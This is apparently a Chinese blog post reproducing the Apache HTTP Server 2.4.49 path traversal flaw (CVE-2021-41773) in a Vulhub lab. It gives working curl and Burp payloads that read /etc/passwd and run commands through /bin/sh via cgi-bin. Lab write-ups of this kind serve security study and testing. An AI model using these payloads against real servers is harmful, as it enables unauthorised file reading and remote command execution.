【漏洞复现】Apache_HTTP_2.4.49_路径穿越漏洞(CVE-2021-41773)

过期的秋刀鱼-2023-11-07 2:37

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

说明 内容
漏洞编号 CVE-2021-41773
漏洞名称 Apache HTTP 路径穿越漏洞
漏洞评级 高危
影响范围 2.4.49
漏洞描述 在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件
修复方案

1.1、漏洞描述

Apache HTTP服务器项目致力于为现代操作系统(包括UNIX和Windows)开发和维护开源HTTP服务器。

在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件。

如果这些目录之外的文件不受通常的默认配置"要求全部拒绝"的保护,则这些请求可以成功。如果CGI脚本也为这些别名路径启用,则可以允许远程代码执行。

1.2、漏洞等级

高危

1.3、影响版本

Apache HTTP Server 2.4.49

1.4、漏洞复现

1、基础环境

Path:Vulhub/httpd/CVE-2021-41773

启动测试环境:

bash 复制代码 
sudo docker-compose build
sudo docker-compose up -d

访问http://your-ip:8080/即可看到

2、漏洞验证
方式一 curl

/icons/必须是现有目录

bash 复制代码 
curl -v --path-as-is http://192.168.80.141:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在服务器上启用mods cgicgid后,此路径遍历漏洞将允许执行任意命令

bash 复制代码 
curl -v --data "echo;id" 'http://192.168.80.141:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
方式二 bp抓包
bash 复制代码 
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
bash 复制代码 
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
echo;id
相关推荐
静若繁花_jingjing5 小时前
面试_项目问题_RPC调用异常
网络·网络协议·rpc
せいしゅん青春之我6 小时前
[JavaEE初阶] 防止网络传输中的中间人入侵---证书
服务器·网络·网络协议·java-ee
问道飞鱼9 小时前
【HTTP知识】HTTP OPTIONS 预检请求深度解析与优化策略
网络·网络协议·http·option·预检
qq_4090229512 小时前
计算机网络
网络协议·tcp/ip·信息与通信
tan180°12 小时前
Linux网络HTTP(中)(8)
linux·网络·http
锐策13 小时前
深入 RFC 793:TCP 报文头部、MSS 协商与三次握手 / 四次挥手全解析
网络·网络协议·tcp/ip
Strawberry_rabbit15 小时前
程序员工作必需之公网和私网
前端·网络协议
噔噔君16 小时前
嵌入式模组拨号获取IP地址时,设置的ippass是什么原理,起到什么作用?
服务器·网络协议·tcp/ip·ip
SRC_BLUE_1716 小时前
NSSCTF - Web | 【SWPUCTF 2021 新生赛】Do_you_know_http
网络·网络协议·http
ehiway17 小时前
国际先进!中科亿海微国产嵌入式FPGA IP核及EDA系统设计技术通过科技成果评价
网络协议·tcp/ip·fpga开发
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03UV安装并设置国内源04Linux下V2Ray安装配置指南05GitLab 零基础入门指南:从安装到项目管理全流程06NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南07一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示08KGG转MP3工具|非KGM文件|解密音频09在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)102025软件测试面试八股文(含答案+文档)